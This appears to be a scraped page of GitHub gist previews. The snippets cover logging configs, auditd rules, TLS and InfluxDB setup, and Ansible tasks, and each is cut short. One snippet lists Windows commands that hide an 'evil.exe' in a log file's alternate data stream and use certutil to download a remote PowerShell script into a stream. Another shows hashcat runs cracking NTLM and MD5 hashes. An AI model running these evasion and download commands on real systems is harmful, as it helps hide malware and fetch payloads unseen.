nyurik

{
  $schema: https://vega.github.io/schema/vega/v3.json
  data: [
    {
      name: esdata
      url: {
        %context%: true
        %timefield%: @timestamp
        index: logstash-*
        body: {

api0cradle

Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab

Neo23x0

# IMPORTANT!
# This gist has been transformed into a github repo 
# You can find the most recent version there:
# https://github.com/Neo23x0/auditd

#      ___             ___ __      __
#     /   | __  ______/ (_) /_____/ /
#    / /| |/ / / / __  / / __/ __  / 
#   / ___ / /_/ / /_/ / / /_/ /_/ /  
#  /_/  |_\__,_/\__,_/_/\__/\__,_/   

BeanBagKing

hashcat64.exe -a 0 -w 0 -m 1000 -r rules/lmNTLM.rule hashes/ntlm.txt lists/lab.txt
hashcat64.exe -a 0 -w 1 -m 1800 hashes/unixmd5.txt lists/rockyou.txt
hashcat64.exe -a 3 -w 1 -m 1800 --increment ?a?a?a?a?a hashes/unixmd5.txt


C:\hashcat-3.10>hashcat64.exe -h
hashcat, advanced password recovery

Usage: hashcat [options]... hash|hashfile|hccapfile [dictionary|mask|directory]...

florisb

import requests
from requests.auth import HTTPBasicAuth
import re
from StringIO import StringIO

JIRA_URL = 'https://your-jira-url.tld/'
JIRA_ACCOUNT = ('jira-username', 'jira-password')
# the JIRA project ID (short)
JIRA_PROJECT = 'PRO'
GITLAB_URL = 'http://your-gitlab-url.tld/'

andrewkroh

Using TLS between Beats and Logstash

The purpose of this document is to help with configuring and troubleshooting using TLS on the connection between Beats and Logstash.

Configuration

You must configure TLS on both the client and server to make this work. This

bjornjohansen

#!/bin/bash
# Copyright © 2015 Bjørn Johansen
# This work is free. You can redistribute it and/or modify it under the
# terms of the Do What The Fuck You Want To Public License, Version 2,
# as published by Sam Hocevar. See http://www.wtfpl.net/ for more details.

WP_PATH="/path/to/wp"

# Check if WP-CLI is available
if ! hash wp 2>/dev/null; then

manuelmeurer

- name: set swap_file variable
  set_fact:
    swap_file: /mnt/{{ swap_space }}.swap

- name: check if swap file exists
  stat:
    path: "{{ swap_file }}"
  register: swap_file_check

- name: create swap file

GaryRogers

Setting up InfluxDB on CentOS/RHEL

The InfluxDB Docs give you a very brief overview of installing InfluxDB on a host. It boils down to 'here's the RPM, install it.' That's fine for looking at the software, but you'll probably want to adjust the configuration a bit for a production environment.

Basic Install

https://influxdb.com/docs/v0.9/introduction/installation.html

Config changes

Modify /etc/opt/influxdb/influxdb.conf

tolleiv

Fortigate 300c log parsing in Logstash

QA ca be done with:

logstash-1.4.2/bin/logstash rspec --format documentation test.rb